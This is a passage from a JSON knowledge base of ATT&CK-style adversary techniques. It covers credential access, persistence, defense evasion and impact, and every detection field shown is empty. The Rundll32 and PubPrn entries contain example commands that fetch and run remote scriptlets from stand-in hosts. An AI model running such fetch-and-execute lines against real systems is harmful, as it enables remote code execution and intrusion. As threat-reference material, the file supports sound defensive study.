initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely. Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. An adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.", "detection": ""}, {"attack_id": "T1557", "name": "Adversary-in-the-Middle", "tactics": ["credential-access", "collection"], "platforms": ["Linux", "macOS", "Network Devices", "Windows"], "description": "Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as Network Sniffing, Transmitted Data Manipulation, or replay attacks (Exploitation for Credential Access). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions. For example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware. Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials, including access tokens (Steal Application Access Token) and session cookies (Steal Web Session Cookie). Downgrade Attacks can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm. Adversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in Transmitted Data Manipulation. Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to impair defenses and/or in support of a Network Denial of Service.", "detection": ""}, {"attack_id": "T1033", "name": "System Owner/User Discovery", "tactics": ["discovery"], "platforms": ["Linux", "macOS", "Network Devices", "Windows"], "description": "Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping. The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Various utilities and commands may acquire this information, including whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts. Environment variables, such as %USERNAME% and $USER, may also be used to access this information. On network devices, Network Device CLI commands such as `show users` and `show ssh` can be used to display users currently logged into the device.", "detection": ""}, {"attack_id": "T1583", "name": "Acquire Infrastructure", "tactics": ["resource-development"], "platforms": ["PRE"], "description": "Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost. Additionally, botnets are available for rent or purchase. Use of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support Proxy, including from residential proxy services. Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.", "detection": ""}, {"attack_id": "T1218.011", "name": "Rundll32", "tactics": ["stealth"], "platforms": ["Windows"], "description": "Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}). Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. For example, ClickOnce can be proxied through Rundll32.exe. Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\" This behavior has been seen used by malware such as Poweliks. Threat actors may also abuse legitimate, signed system DLLs (e.g., zipfldr.dll, ieframe.dll) with rundll32.exe to execute malicious programs or scripts indirectly, making their activity appear more legitimate and evading detection. Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones. DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1). Additionally, adversaries may use Masquerading techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.", "detection": ""}, {"attack_id": "T1613", "name": "Container and Resource Discovery", "tactics": ["discovery"], "platforms": ["Containers"], "description": "Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster. These resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs. In Docker, logs may leak information about the environment, such as the environment’s configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversary’s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution.", "detection": ""}, {"attack_id": "T1583.007", "name": "Serverless", "tactics": ["resource-development"], "platforms": ["PRE"], "description": "Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them. Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to Proxy traffic to an adversary-owned command and control server. As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to Hide Infrastructure.", "detection": ""}, {"attack_id": "T1132.001", "name": "Standard Encoding", "tactics": ["command-and-control"], "platforms": ["ESXi", "Linux", "macOS", "Windows"], "description": "Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME. Some data encoding systems may also result in data compression, such as gzip.", "detection": ""}, {"attack_id": "T1027.009", "name": "Embedded Payloads", "tactics": ["stealth"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused to carry and obfuscate malicious payloads and content. In some cases, embedded payloads may also enable adversaries to Subvert Trust Controls by not impacting execution controls such as digital signatures and notarization tickets. Adversaries may embed payloads in various file formats to hide payloads. This is similar to Steganography, though does not involve weaving malicious content into specific bytes and patterns related to legitimate digital media formats. For example, adversaries have been observed embedding payloads within or as an overlay of an otherwise benign binary. Adversaries have also been observed nesting payloads (such as executables and run-only scripts) inside a file of the same format. Embedded content may also be used as Process Injection payloads used to infect benign system processes. These embedded then injected payloads may be used as part of the modules of malware designed to provide specific features such as encrypting C2 communications in support of an orchestrator module. For example, an embedded module may be injected into default browsers, allowing adversaries to then communicate via the network.", "detection": ""}, {"attack_id": "T1556.003", "name": "Pluggable Authentication Modules", "tactics": ["defense-impairment", "persistence", "credential-access"], "platforms": ["Linux", "macOS"], "description": "Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /etc/shadow. Adversaries may modify components of the PAM system to create backdoors. PAM components, such as pam_unix.so, can be patched to accept arbitrary adversary supplied values as legitimate credentials. Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.", "detection": ""}, {"attack_id": "T1578.004", "name": "Revert Cloud Instance", "tactics": ["defense-impairment"], "platforms": ["IaaS"], "description": "An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs. Another variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.", "detection": ""}, {"attack_id": "T1592", "name": "Gather Victim Host Information", "tactics": ["reconnaissance"], "platforms": ["PRE"], "description": "Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.). Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information. Adversaries may also compromise sites then include malicious content designed to collect host information from visitors. Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: Supply Chain Compromise or External Remote Services). Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.", "detection": ""}, {"attack_id": "T1596.003", "name": "Digital Certificates", "tactics": ["reconnaissance"], "platforms": ["PRE"], "description": "Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location. Adversaries may search digital certificate data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about certificates. Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used from encrypted web traffic are served with content). Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Active Scanning or Phishing for Information), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: External Remote Services or Trusted Relationship).", "detection": ""}, {"attack_id": "T1056.001", "name": "Keylogging", "tactics": ["collection", "credential-access"], "platforms": ["Linux", "macOS", "Network Devices", "Windows"], "description": "Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when OS Credential Dumping efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. In order to increase the likelihood of capturing credentials quickly, an adversary may also perform actions such as clearing browser cookies to force users to reauthenticate to systems. Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes. Some methods include: * Hooking API callbacks used for processing keystrokes. Unlike Credential API Hooking, this focuses solely on API functions intended for processing keystroke data. * Reading raw keystroke data from the hardware buffer. * Windows Registry modifications. * Custom drivers. * Modify System Image may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.", "detection": ""}, {"attack_id": "T1564.012", "name": "File/Path Exclusions", "tactics": ["stealth"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may attempt to hide their file-based artifacts by writing them to specific folders or file names excluded from antivirus (AV) scanning and other defensive capabilities. AV and other file-based scanners often include exclusions to optimize performance as well as ease installation and legitimate use of applications. These exclusions may be contextual (e.g., scans are only initiated in response to specific triggering events/alerts), but are also often hardcoded strings referencing specific folders and/or files assumed to be trusted and legitimate. Adversaries may abuse these exclusions to hide their file-based artifacts. For example, rather than tampering with tool settings to add a new exclusion (i.e., Disable or Modify Tools), adversaries may drop their file-based payloads in default or otherwise well-known exclusions. Adversaries may also use Security Software Discovery and other Discovery/Reconnaissance activities to both discover and verify existing exclusions in a victim environment.", "detection": ""}, {"attack_id": "T1222.002", "name": "Linux and Mac Permissions", "tactics": ["defense-impairment"], "platforms": ["Linux", "macOS"], "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files. File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: chown (short for change owner), and chmod (short for change mode). Adversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Unix Shell Configuration Modification or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.", "detection": ""}, {"attack_id": "T1110.001", "name": "Password Guessing", "tactics": ["credential-access"], "platforms": ["Containers", "ESXi", "IaaS", "Identity Provider", "Linux", "macOS", "Network Devices", "Office Suite", "SaaS", "Windows"], "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts. Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. Typically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following: * SSH (22/TCP) * Telnet (23/TCP) * FTP (21/TCP) * NetBIOS / SMB / Samba (139/TCP & 445/TCP) * LDAP (389/TCP) * Kerberos (88/TCP) * RDP / Terminal Services (3389/TCP) * HTTP/HTTP Management Services (80/TCP & 443/TCP) * MSSQL (1433/TCP) * Oracle (1521/TCP) * MySQL (3306/TCP) * VNC (5900/TCP) * SNMP (161/UDP and 162/TCP/UDP) In addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.. Further, adversaries may abuse network device interfaces (such as `wlanAPI`) to brute force accessible wifi-router(s) via wireless authentication protocols. In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows \"logon failure\" event ID 4625.", "detection": ""}, {"attack_id": "T1216.001", "name": "PubPrn", "tactics": ["stealth"], "platforms": ["Windows"], "description": "Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the Windows Command Shell via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com. Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites. To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script. In later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S).", "detection": ""}, {"attack_id": "T1597.002", "name": "Purchase Technical Data", "tactics": ["reconnaissance"], "platforms": ["PRE"], "description": "Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets. Adversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim’s infrastructure. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Websites/Domains), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: External Remote Services or Valid Accounts).", "detection": ""}, {"attack_id": "T1003", "name": "OS Credential Dumping", "tactics": ["credential-access"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures. Credentials can then be used to perform Lateral Movement and access restricted information. Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.", "detection": ""}, {"attack_id": "T1129", "name": "Shared Modules", "tactics": ["execution"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API). Adversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, adversaries can modularize functionality of their malware into shared objects that perform various functions such as managing C2 network communications or execution of specific actions on objective. The Linux & macOS module loader can load and execute shared objects from arbitrary local paths. This functionality resides in `dlfcn.h` in functions such as `dlopen` and `dlsym`. Although macOS can execute `.so` files, common practice uses `.dylib` files. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in `NTDLL.dll` and is part of the Windows Native API which is called from functions like `LoadLibrary` at run time.", "detection": ""}, {"attack_id": "T1602", "name": "Data from Configuration Repository", "tactics": ["collection"], "platforms": ["Network Devices"], "description": "Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices. Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.", "detection": ""}, {"attack_id": "T1561.002", "name": "Disk Structure Wipe", "tactics": ["impact"], "platforms": ["Linux", "macOS", "Network Devices", "Windows"], "description": "Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. Adversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table. The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. Disk Structure Wipe may be performed in isolation, or along with Disk Content Wipe if all sectors of a disk are wiped. On a network devices, adversaries may reformat the file system using Network Device CLI commands such as `format`. To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.", "detection": ""}, {"attack_id": "T1498.001", "name": "Direct Network Flood", "tactics": ["impact"], "platforms": ["Windows", "IaaS", "Linux", "macOS"], "description": "Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. Direct Network Floods are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well. Botnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.", "detection": ""}, {"attack_id": "T1574.007", "name": "Path Interception by PATH Environment Variable", "tactics": ["stealth", "execution"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. The PATH environment variable contains a list of directories (User and System) that the OS searches sequentially through in search of the binary that was called from a script or the command line. Adversaries can place a malicious program in an earlier entry in the list of directories stored in the PATH environment variable, resulting in the operating system executing the malicious binary rather than the legitimate binary when it searches sequentially through that PATH listing. For example, on Windows if an adversary places a malicious program named \"net.exe\" in `C:\\example path`, which by default precedes `C:\\Windows\\system32\\net.exe` in the PATH environment variable, when \"net\" is executed from the command-line the `C:\\example path` will be called instead of the system's legitimate executable at `C:\\Windows\\system32\\net.exe`. Some methods of executing a program rely on the PATH environment variable to determine the locations that are searched when the path for the program is not given, such as executing programs from a Command and Scripting Interpreter. Adversaries may also directly modify the $PATH variable specifying the directories to be searched. An adversary can modify the `$PATH` variable to point to a directory they have write access. When a program using the $PATH variable is called, the OS searches the specified directory and executes the malicious binary. On macOS, this can also be performed through modifying the $HOME variable. These variables can be modified using the command-line, launchctl, Unix Shell Configuration Modification, or modifying the `/etc/paths.d` folder contents.", "detection": ""}, {"attack_id": "T1213.002", "name": "Sharepoint", "tactics": ["collection"], "platforms": ["Office Suite", "Windows"], "description": "Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint: * Policies, procedures, and standards * Physical / logical network diagrams * System architecture diagrams * Technical system documentation * Testing / development credentials (i.e., Unsecured Credentials) * Work / project schedules * Source code snippets * Links to network shares and other internal resources", "detection": ""}, {"attack_id": "T1006", "name": "Direct Volume Access", "tactics": ["stealth"], "platforms": ["Network Devices", "Windows"], "description": "Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. Utilities, such as `NinjaCopy`, exist to perform these actions in PowerShell. Adversaries may also use built-in or third-party utilities (such as `vssadmin`, `wbadmin`, and esentutl) to create shadow copies or backups of data from system volumes.", "detection": ""}, {"attack_id": "T1588.007", "name": "Artificial Intelligence", "tactics": ["resource-development"], "platforms": ["PRE"], "description": "Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks, including conducting Reconnaissance, creating basic scripts, assisting social engineering, and even developing payloads. For example, by utilizing a publicly available LLM an adversary is essentially outsourcing or automating certain tasks to the tool. Using AI, the adversary may draft and generate content in a variety of written languages to be used in Phishing/Phishing for Information campaigns. The same publicly available tool may further enable vulnerability or other offensive research supporting Develop Capabilities. AI tools may also automate technical tasks by generating, refining, or otherwise enhancing (e.g., Obfuscated Files or Information) malicious scripts and payloads. Finally, AI-generated text, images, audio, and video may be used for fraud, Impersonation, and other malicious activities.", "detection": ""}, {"attack_id": "T1666", "name": "Modify Cloud Resource Hierarchy", "tactics": ["defense-impairment"], "platforms": ["IaaS"], "description": "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service (IaaS) environments in order to evade defenses. IaaS environments often group resources into a hierarchy, enabling improved resource management and application of policies to relevant groups. Hierarchical structures differ among cloud providers. For example, in AWS environments, multiple accounts can be grouped under a single organization, while in Azure environments, multiple subscriptions can be grouped under a single management group. Adversaries may add, delete, or otherwise modify resource groups within an IaaS hierarchy. For example, in Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources. They may also engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant. This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant. In AWS environments, adversaries with appropriate permissions in a given account may call the `LeaveOrganization` API, causing the account to be severed from the AWS Organization to which it was tied and removing any Service Control Policies, guardrails, or restrictions imposed upon it by its former Organization. Alternatively, adversaries may call the `CreateAccount` API in order to create a new account within an AWS Organization. This account will use the same payment methods registered to the payment account but may not be subject to existing detections or Service Control Policies.", "detection": ""}, {"attack_id": "T1564.008", "name": "Email Hiding Rules", "tactics": ["stealth"], "platforms": ["Windows", "Linux", "macOS", "Office Suite"], "description": "Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule or Set-InboxRule PowerShell cmdlets on Windows systems. Adversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to Internal Spearphishing emails sent from the compromised account. Any user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as malware, suspicious, phish, and hack) found in message bodies and subject lines. In some environments, administrators may be able to enable email rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions. Adversaries that abuse such features may be able to automatically modify or delete all emails related to specific topics (such as internal security incident notifications).", "detection": ""}, {"attack_id": "T1491.002", "name": "External Defacement", "tactics": ["impact"], "platforms": ["Windows", "IaaS", "Linux", "macOS"], "description": "An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. External Defacement may ultimately cause users to distrust the systems and to question/discredit the system’s integrity. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda. External Defacement may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as Drive-by Compromise.", "detection": ""}, {"attack_id": "T1027.013", "name": "Encrypted/Encoded File", "tactics": ["stealth"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. Many other techniques, such as Software Packing, Steganography, and Embedded Payloads, share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., Deobfuscate/Decode Files or Information) at the time of execution/use. This type of file obfuscation can be applied to many file artifacts present on victim hosts, such as malware log/configuration and payload files. Files can be encrypted with a hardcoded or user-supplied key, as well as otherwise obfuscated using standard encoding schemes such as Base64. The entire content of a file may be obfuscated, or just specific functions or values (such as C2 addresses). Encryption and encoding may also be applied in redundant layers for additional protection. For example, adversaries may abuse password-protected Word documents or self-extracting (SFX) archives as a method of encrypting/encoding a file such as a Phishing payload. These files typically function by attaching the intended archived content to a decompressor stub that is executed when the file is invoked (e.g., User Execution). Adversaries may also abuse file-specific as well as custom encoding schemes. For example, Byte Order Mark (BOM) headers in text files may be abused to manipulate and obfuscate file content until Command and Scripting Interpreter execution.", "detection": ""}, {"attack_id": "T1590.005", "name": "IP Addresses", "tactics": ["reconnaissance"], "platforms": ["PRE"], "description": "Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted. Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information. Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: Search Open Technical Databases). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Active Scanning or Search Open Websites/Domains), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: External Remote Services).", "detection": ""}, {"attack_id": "T1499.001", "name": "OS Exhaustion Flood", "tactics": ["impact"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes. Different ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods. With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server. ACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.", "detection": ""}, {"attack_id": "T1014", "name": "Rootkit", "tactics": ["stealth"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor or System Firmware. Rootkits have been seen for Windows, Linux, and Mac OS X systems. Rootkits that reside or modify boot sectors are known as Bootkits and specifically target the boot process of the operating system.", "detection": ""}, {"attack_id": "T1546.013", "name": "PowerShell Profile", "tactics": ["privilege-escalation", "persistence"], "platforms": ["Windows"], "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile (profile.ps1) is a script that runs when PowerShell starts and can be used as a logon script to customize user environments. PowerShell supports several profiles depending on the user or host program. For example, there can be different profiles for PowerShell host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. Adversaries may modify these profiles to include arbitrary commands, functions, modules, and/or PowerShell drives to gain persistence. Every time a user opens a PowerShell session the modified script will be executed unless the -NoProfile flag is used when it is launched. An adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator.", "detection": ""}, {"attack_id": "T1059.007", "name": "JavaScript", "tactics": ["execution"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language 